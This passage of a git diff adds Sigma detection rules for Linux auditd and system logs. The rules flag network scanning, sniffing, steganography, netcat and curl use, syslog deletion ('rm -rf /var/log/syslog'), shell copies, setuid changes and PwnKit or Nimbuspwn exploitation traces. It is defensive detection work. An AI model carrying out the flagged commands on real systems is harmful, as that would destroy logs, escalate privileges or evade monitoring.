or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. +author: Timur Zinniatullin, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md +date: 2019/10/21 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'execve' + a0: 'cp' + a1: '-i' + a2: '/bin/sh' + a3|endswith: '/crond' + condition: selection +level: medium +tags: + - attack.defense_evasion + - attack.t1036.003 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_network_service_scanning.yml b/bin/main/rules/linux/auditd/lnx_auditd_network_service_scanning.yml new file mode 100644 index 000000000..ff1e827e6 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_network_service_scanning.yml @@ -0,0 +1,32 @@ +title: Linux Network Service Scanning +id: 3761e026-f259-44e6-8826-719ed8079408 +related: + - id: 3e102cd9-a70d-4a7a-9508-403963092f31 + type: derived +status: experimental +description: Detects enumeration of local or remote network services. +author: Alejandro Ortuno, oscd.community +date: 2020/10/21 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md +tags: + - attack.discovery + - attack.t1046 +logsource: + product: linux + service: auditd + definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/master/audit.rules#L182-L183' +detection: + selection: + type: 'SYSCALL' + exe|endswith: + - '/telnet' + - '/nmap' + - '/netcat' + - '/nc' + key: 'network_connect_4' + condition: selection +falsepositives: + - Legitimate administration activities +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_network_sniffing.yml b/bin/main/rules/linux/auditd/lnx_auditd_network_sniffing.yml new file mode 100644 index 000000000..85be63038 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_network_sniffing.yml @@ -0,0 +1,31 @@ +title: Network Sniffing +id: f4d3748a-65d1-4806-bd23-e25728081d01 +status: test +description: Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. +author: Timur Zinniatullin, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md +date: 2019/10/21 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection1: + type: 'execve' + a0: 'tcpdump' + a1: '-c' + a3|contains: '-i' + selection2: + type: 'execve' + a0: 'tshark' + a1: '-c' + a3: '-i' + condition: selection1 or selection2 +falsepositives: + - Legitimate administrator or user uses network sniffing tool for legitimate reasons. +level: low +tags: + - attack.credential_access + - attack.discovery + - attack.t1040 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/bin/main/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml new file mode 100644 index 000000000..29fe14e15 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -0,0 +1,31 @@ +title: OMIGOD SCX RunAsProvider ExecuteShellCommand +id: 045b5f9c-49f7-4419-a236-9854fb3c827a +description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/09/17 +modified: 2021/11/11 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + syscall: 'execve' + uid: '0' + cwd: '/var/opt/microsoft/scx/tmp' + comm: 'sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. +level: high diff --git a/bin/main/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml b/bin/main/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml new file mode 100644 index 000000000..e017b7d48 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml @@ -0,0 +1,43 @@ +title: Password Policy Discovery +id: ca94a6db-8106-4737-9ed2-3e3bb826af0a +status: stable +description: Detects password policy discovery commands +author: Ömer Günal, oscd.community, Pawel Mazur +date: 2020/10/08 +modified: 2021/11/12 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md + - https://attack.mitre.org/techniques/T1201/ + - https://linux.die.net/man/1/chage + - https://man7.org/linux/man-pages/man1/passwd.1.html + - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu +logsource: + product: linux + service: auditd +detection: + files: + type: 'PATH' + name: + - '/etc/pam.d/common-password' + - '/etc/security/pwquality.conf' + - '/etc/pam.d/system-auth' + - '/etc/login.defs' + chage: + type: 'EXECVE' + a0: 'chage' + a1: + - '--list' + - '-l' + passwd: + type: 'EXECVE' + a0: 'passwd' + a1: + - '-S' + - '--status' + condition: files or chage or passwd +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.discovery + - attack.t1201 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml b/bin/main/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml new file mode 100644 index 000000000..d7cc90375 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml @@ -0,0 +1,28 @@ +title: Systemd Service Reload or Start +id: 2625cc59-0634-40d0-821e-cb67382a3dd7 +status: test +description: Detects a reload or a start of a service. +author: Jakob Weinzettl, oscd.community +references: + - https://attack.mitre.org/techniques/T1543/002/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md +date: 2019/09/23 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'EXECVE' + a0|contains: 'systemctl' + a1|contains: + - 'daemon-reload' + - 'start' + condition: selection +falsepositives: + - Installation of legitimate service. + - Legitimate reconfiguration of service. +level: low +tags: + - attack.persistence + - attack.t1543.002 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_screencapture_import.yml b/bin/main/rules/linux/auditd/lnx_auditd_screencapture_import.yml new file mode 100644 index 000000000..4b9b6c736 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_screencapture_import.yml @@ -0,0 +1,37 @@ +title: Screen Capture with Import Tool +id: dbe4b9c5-c254-4258-9688-d6af0b7967fd +description: Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/21 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md + - https://attack.mitre.org/techniques/T1113/ + - https://linux.die.net/man/1/import + - https://imagemagick.org/ +logsource: + product: linux + service: auditd +detection: + import: + type: EXECVE + a0: import + import_window_root: + a1: '-window' + a2: 'root' + a3|endswith: + - '.png' + - '.jpg' + - '.jpeg' + import_no_window_root: + a1|endswith: + - '.png' + - '.jpg' + - '.jpeg' + condition: import and (import_window_root or import_no_window_root) +tags: + - attack.collection + - attack.t1113 +falsepositives: + - Legitimate use of screenshot utility +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml b/bin/main/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml new file mode 100644 index 000000000..0af916ba4 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml @@ -0,0 +1,31 @@ +title: Screen Capture with Xwd +id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c +description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations +author: 'Pawel Mazur' +status: experimental +date: 2021/09/13 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md + - https://attack.mitre.org/techniques/T1113/ + - https://linux.die.net/man/1/xwd +logsource: + product: linux + service: auditd +detection: + xwd: + type: EXECVE + a0: xwd + xwd_root_window: + a1: '-root' + a2: '-out' + a3|endswith: '.xwd' + xwd_no_root_window: + a1: '-out' + a2|endswith: '.xwd' + condition: xwd and (xwd_root_window or xwd_no_root_window) +tags: + - attack.collection + - attack.t1113 +falsepositives: + - Legitimate use of screenshot utility +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml b/bin/main/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml new file mode 100644 index 000000000..ef91d1ef2 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml @@ -0,0 +1,23 @@ +title: 'Split A File Into Pieces' +id: 2dad0cba-c62a-4a4f-949f-5f6ecd619769 +status: test +description: 'Detection use of the command "split" to split files into parts and possible transfer.' +author: 'Igor Fits, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md +date: 2020/10/15 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + comm: 'split' + condition: selection +falsepositives: + - Legitimate administrative activity +level: low +tags: + - attack.exfiltration + - attack.t1030 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml b/bin/main/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml new file mode 100644 index 000000000..cc4cd5189 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml @@ -0,0 +1,30 @@ +title: Steganography Hide Files with Steghide +id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 +description: Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/11 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - Unknown +level: low +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: steghide + a1: embed + a2: + - '-cf' + - '-ef' + a4: + - '-cf' + - '-ef' + condition: selection diff --git a/bin/main/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml b/bin/main/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml new file mode 100644 index 000000000..9dcd4df23 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml @@ -0,0 +1,28 @@ +title: Steganography Extract Files with Steghide +id: a5a827d9-1bbe-4952-9293-c59d897eb41b +description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/11 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - Unknown +level: low +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: steghide + a1: extract + a2: '-sf' + a3|endswith: + - '.jpg' + - '.png' + condition: selection diff --git a/bin/main/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml b/bin/main/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml new file mode 100644 index 000000000..7641995de --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml @@ -0,0 +1,21 @@ +title: Suspicious C2 Activities +id: f7158a64-6204-4d6d-868a-6e6378b467e0 +status: test +description: Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) +author: Marie Euler +references: + - 'https://github.com/Neo23x0/auditd' +date: 2020/05/18 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + key: 'susp_activity' + condition: selection +falsepositives: + - Admin or User activity +level: medium +tags: + - attack.command_and_control diff --git a/bin/main/rules/linux/auditd/lnx_auditd_susp_cmds.yml b/bin/main/rules/linux/auditd/lnx_auditd_susp_cmds.yml new file mode 100644 index 000000000..b8c330a13 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_susp_cmds.yml @@ -0,0 +1,36 @@ +title: Suspicious Commands Linux +id: 1543ae20-cbdf-4ec1-8d12-7664d667a825 +status: test +description: Detects relevant commands often related to malware or hacking activity +author: Florian Roth +references: + - Internal Research - mostly derived from exploit code including code in MSF +date: 2017/12/12 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + cmd1: + type: 'EXECVE' + a0: 'chmod' + a1: '777' + cmd2: + type: 'EXECVE' + a0: 'chmod' + a1: 'u+s' + cmd3: + type: 'EXECVE' + a0: 'cp' + a1: '/bin/ksh' + cmd4: + type: 'EXECVE' + a0: 'cp' + a1: '/bin/sh' + condition: 1 of cmd* +falsepositives: + - Admin activity +level: medium +tags: + - attack.execution + - attack.t1059.004 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml b/bin/main/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml new file mode 100644 index 000000000..b1cf17ce9 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml @@ -0,0 +1,44 @@ +title: Program Executions in Suspicious Folders +id: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc +status: test +description: Detects program executions in suspicious non-program folders related to malware or hacking activity +author: Florian Roth +references: + - Internal Research +date: 2018/01/23 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + exe|startswith: + # Temporary folder + - '/tmp/' + # Web server + - '/var/www/' # Standard + - '/home/*/public_html/' # Per-user + - '/usr/local/apache2/' # Classical Apache + - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache + - '/var/apache/' # Solaris Apache + - '/srv/www/' # SuSE Linux 9.* + - '/home/httpd/html/' # Redhat 6 or older Apache + - '/srv/http/' # ArchLinux standard + - '/usr/share/nginx/html/' # ArchLinux nginx + # Data dirs of typically exploited services (incomplete list) + - '/var/lib/pgsql/data/' + - '/usr/local/mysql/data/' + - '/var/lib/mysql/' + - '/var/vsftpd/' + - '/etc/bind/' + - '/var/named/' + condition: selection +falsepositives: + - Admin activity (especially in /tmp folders) + - Crazy web applications +level: medium +tags: + - attack.t1587 + - attack.t1584 + - attack.resource_development diff --git a/bin/main/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/bin/main/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml new file mode 100644 index 000000000..4eaefc716 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -0,0 +1,36 @@ +title: 'Suspicious History File Operations' +id: eae8ce9f-bde9-47a6-8e79-f20d18419910 +status: test +description: 'Detects commandline operations on shell history files' +author: 'Mikhail Larin, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md +date: 2020/10/17 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history +fields: + - a0 + - a1 + - a2 + - a3 + - key +falsepositives: + - Legitimate administrative activity + - Legitimate software, cleaning hist file +level: medium +tags: + - attack.credential_access + - attack.t1552.003 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery.yml new file mode 100644 index 000000000..223be5b49 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -0,0 +1,31 @@ +title: System Information Discovery +id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 +description: Detects System Information Discovery commands +author: 'Pawel Mazur' +status: experimental +date: 2021/09/03 +references: + - https://attack.mitre.org/techniques/T1082/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md +logsource: + product: linux + service: auditd +detection: + selection: + type: PATH + name: + - /etc/lsb-release + - /etc/redhat-release + - /etc/issue + selection2: + type: EXECVE + a0: + - uname + - uptime + condition: selection or selection2 +tags: + - attack.discovery + - attack.t1082 +falsepositives: + - Legitimate administrative activity +level: low diff --git a/bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml b/bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml new file mode 100644 index 000000000..dc0f65b67 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml @@ -0,0 +1,35 @@ +title: System Information Discovery +id: 1f358e2e-cb63-43c3-b575-dfb072a6814f +related: + - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 + type: derived +status: stable +description: Detects system information discovery commands +author: Ömer Günal, oscd.community +date: 2020/10/08 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md +tags: + - attack.discovery + - attack.t1082 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - '/sys/class/dmi/id/bios_version' + - '/sys/class/dmi/id/product_name' + - '/sys/class/dmi/id/chassis_vendor' + - '/proc/scsi/scsi' + - '/proc/ide/hd0/model' + - '/proc/version' + - '/etc/*version' + - '/etc/*release' + - '/etc/issue' + condition: selection +falsepositives: + - Legitimate administration activities +level: informational diff --git a/bin/main/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml b/bin/main/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml new file mode 100644 index 000000000..61dfc0fb6 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml @@ -0,0 +1,33 @@ +title: 'System Shutdown/Reboot' +id: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f +status: test +description: 'Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.' +author: 'Igor Fits, oscd.community' +references: + - hhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md +date: 2020/10/15 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + execve: + type: 'EXECVE' + shutdowncmd: + - 'shutdown' + - 'reboot' + - 'halt' + - 'poweroff' + init: + - 'init' + - 'telinit' + initselection: + - '0' + - '6' + condition: execve and (shutdowncmd or (init and initselection)) +falsepositives: + - Legitimate administrative activity +level: informational +tags: + - attack.impact + - attack.t1529 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml b/bin/main/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml new file mode 100644 index 000000000..96bfcc8be --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml @@ -0,0 +1,30 @@ +title: Systemd Service Creation +id: 1bac86ba-41aa-4f62-9d6b-405eac99b485 +status: experimental +description: Detects a creation of systemd services which could be used by adversaries to execute malicious code. +author: 'Pawel Mazur' +references: + - https://attack.mitre.org/techniques/T1543/002/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md +date: 2022/02/03 +modified: 2022/02/06 +logsource: + product: linux + service: auditd +detection: + path: + type: 'PATH' + nametype: 'CREATE' + name_1: + name|startswith: + - '/usr/lib/systemd/system/' + - '/etc/systemd/system/' + name_2: + name|contains: '/.config/systemd/user/' + condition: path and 1 of name_* +falsepositives: + - Admin work like legit service installs. +level: medium +tags: + - attack.persistence + - attack.t1543.002 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml b/bin/main/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml new file mode 100644 index 000000000..6673e20bf --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml @@ -0,0 +1,27 @@ +title: Steganography Unzip Hidden Information From Picture File +id: edd595d7-7895-4fa7-acb3-85a18a8772ca +description: Detects extracting of zip file from image file +author: 'Pawel Mazur' +status: experimental +date: 2021/09/09 +references: + - https://attack.mitre.org/techniques/T1027/003/ + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +tags: + - attack.defense_evasion + - attack.t1027.003 +falsepositives: + - Unknown +level: low +logsource: + product: linux + service: auditd +detection: + commands: + type: EXECVE + a0: unzip + a1: + a1|endswith: + - '.jpg' + - '.png' + condition: commands and a1 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_user_discovery.yml b/bin/main/rules/linux/auditd/lnx_auditd_user_discovery.yml new file mode 100644 index 000000000..6526a061d --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_user_discovery.yml @@ -0,0 +1,26 @@ +title: System Owner or User Discovery +id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 +status: test +description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. +author: Timur Zinniatullin, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md +date: 2019/10/21 +modified: 2021/11/27 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'EXECVE' + a0: + - 'users' + - 'w' + - 'who' + condition: selection +falsepositives: + - Admin activity +level: low +tags: + - attack.discovery + - attack.t1033 diff --git a/bin/main/rules/linux/auditd/lnx_auditd_web_rce.yml b/bin/main/rules/linux/auditd/lnx_auditd_web_rce.yml new file mode 100644 index 000000000..f9402ce14 --- /dev/null +++ b/bin/main/rules/linux/auditd/lnx_auditd_web_rce.yml @@ -0,0 +1,25 @@ +title: Webshell Remote Command Execution +id: c0d3734d-330f-4a03-aae2-65dacc6a8222 +status: experimental +description: Detects possible command execution by web application/web shell +author: Ilyas Ochkov, Beyu Denis, oscd.community +date: 2019/10/12 +modified: 2021/11/11 +references: + - personal experience +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + syscall: 'execve' + key: 'detect_execve_www' + condition: selection +falsepositives: + - Admin activity + - Crazy web applications +level: critical +tags: + - attack.persistence + - attack.t1505.003 diff --git a/bin/main/rules/linux/builtin/lnx_buffer_overflows.yml b/bin/main/rules/linux/builtin/lnx_buffer_overflows.yml new file mode 100644 index 000000000..1449076e1 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_buffer_overflows.yml @@ -0,0 +1,23 @@ +title: Buffer Overflow Attempts +id: 18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781 +status: stable +description: Detects buffer overflow attempts in Unix system log files +author: Florian Roth +date: 2017/03/01 +references: + - https://github.com/ossec/ossec-hids/blob/master/etc/rules/attack_rules.xml +logsource: + product: linux +detection: + keywords: + - 'attempt to execute code on stack by' + - 'FTP LOGIN FROM .* 0bin0sh' + - 'rpc.statd[\d+]: gethostbyname error for' + - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.t1068 + - attack.privilege_escalation diff --git a/bin/main/rules/linux/builtin/lnx_clear_syslog.yml b/bin/main/rules/linux/builtin/lnx_clear_syslog.yml new file mode 100644 index 000000000..ac9fa13cd --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_clear_syslog.yml @@ -0,0 +1,28 @@ +title: Commands to Clear or Remove the Syslog +id: e09eb557-96d2-4de9-ba2d-30f712a5afd3 +status: experimental +description: Detects specific commands commonly used to remove or empty the syslog +author: Max Altgelt +date: 2021/09/10 +references: + - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 +tags: + - attack.impact + - attack.t1565.001 +logsource: + product: linux +detection: + selection: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + falsepositives: + - '/syslog.' + condition: selection and not falsepositives +falsepositives: + - Log rotation +level: high diff --git a/bin/main/rules/linux/builtin/lnx_crontab_file_modification.yml b/bin/main/rules/linux/builtin/lnx_crontab_file_modification.yml new file mode 100644 index 000000000..dc5bde7ba --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_crontab_file_modification.yml @@ -0,0 +1,22 @@ +title: Modifying Crontab +id: af202fd3-7bff-4212-a25a-fb34606cfcbe +status: experimental +description: Detects suspicious modification of crontab file. +# log example: Apr 16 11:18:18 localhost CROND[3333]: (user) REPLACE (user) +author: Pawel Mazur +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md +date: 2022/04/16 +logsource: + product: linux + service: cron +detection: + keywords: + - 'REPLACE' + condition: keywords +falsepositives: + - Legitimate modification of crontab +level: medium +tags: + - attack.persistence + - attack.t1053.003 diff --git a/bin/main/rules/linux/builtin/lnx_file_copy.yml b/bin/main/rules/linux/builtin/lnx_file_copy.yml new file mode 100644 index 000000000..81b77d8fa --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_file_copy.yml @@ -0,0 +1,26 @@ +title: Remote File Copy +id: 7a14080d-a048-4de8-ae58-604ce58a795b +status: stable +description: Detects the use of tools that copy files from or to remote systems +author: Ömer Günal +date: 2020/06/18 +references: + - https://attack.mitre.org/techniques/T1105/ +logsource: + product: linux +detection: + tools: + - 'scp ' + - 'rsync ' + - 'sftp ' + filter: + - '@' + - ':' + condition: tools and filter +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.command_and_control + - attack.lateral_movement + - attack.t1105 diff --git a/bin/main/rules/linux/builtin/lnx_ldso_preload_injection.yml b/bin/main/rules/linux/builtin/lnx_ldso_preload_injection.yml new file mode 100644 index 000000000..d4f3ef753 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_ldso_preload_injection.yml @@ -0,0 +1,21 @@ +title: Code Injection by ld.so Preload +id: 7e3c4651-c347-40c4-b1d4-d48590fdf684 +status: experimental +description: Detects the ld.so preload persistence file. See `man ld.so` for more information. +author: Christian Burkard +date: 2021/05/05 +references: + - https://man7.org/linux/man-pages/man8/ld.so.8.html +logsource: + product: linux +detection: + keywords: + - '/etc/ld.so.preload' + condition: keywords +falsepositives: + - Rare temporary workaround for library misconfiguration +level: high +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1574.006 diff --git a/bin/main/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml b/bin/main/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml new file mode 100644 index 000000000..2a921b04a --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml @@ -0,0 +1,23 @@ +title: Nimbuspwn Exploitation +id: 7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8 +status: experimental +description: Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800) +author: Bhabesh Raj +references: + - https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ + - https://github.com/Immersive-Labs-Sec/nimbuspwn +date: 2022/05/04 +logsource: + product: linux +detection: + keyword: + - 'networkd-dispatcher' + - 'Error handling notification for interface' + - '../../' + condition: all of keyword +falsepositives: + - Unknown +level: high +tags: + - attack.privilege_escalation + - attack.t1068 diff --git a/bin/main/rules/linux/builtin/lnx_proxy_connection.yml b/bin/main/rules/linux/builtin/lnx_proxy_connection.yml new file mode 100644 index 000000000..8a527c94b --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_proxy_connection.yml @@ -0,0 +1,21 @@ +title: Connection Proxy +id: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c +status: test +description: Detects setting proxy +author: Ömer Günal +references: + - https://attack.mitre.org/techniques/T1090/ +date: 2020/06/17 +modified: 2021/11/27 +logsource: + product: linux +detection: + keywords: + - 'http_proxy=*' + - 'https_proxy=*' + condition: keywords +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.defense_evasion diff --git a/bin/main/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml b/bin/main/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml new file mode 100644 index 000000000..d6f1d9351 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml @@ -0,0 +1,23 @@ +title: PwnKit Local Privilege Escalation +id: 0506a799-698b-43b4-85a1-ac4c84c720e9 +status: experimental +description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs +author: Sreeman +date: 2022/01/26 +references: + - https://twitter.com/wdormann/status/1486161836961579020 +logsource: + product: linux + service: auth +detection: + keyword: + - 'pkexec' + - 'The value for environment variable XAUTHORITY contains suscipious content' + - '[USER=root] [TTY=/dev/pts/0]' + condition: all of keyword +falsepositives: + - Unknown +level: high +tags: + - attack.privilege_escalation + - attack.t1548.001 diff --git a/bin/main/rules/linux/builtin/lnx_setgid_setuid.yml b/bin/main/rules/linux/builtin/lnx_setgid_setuid.yml new file mode 100644 index 000000000..45cc3acbd --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_setgid_setuid.yml @@ -0,0 +1,25 @@ +title: Setuid and Setgid +id: c21c4eaa-ba2e-419a-92b2-8371703cbe21 +status: test +description: Detects suspicious change of file privileges with chown and chmod commands +author: Ömer Günal 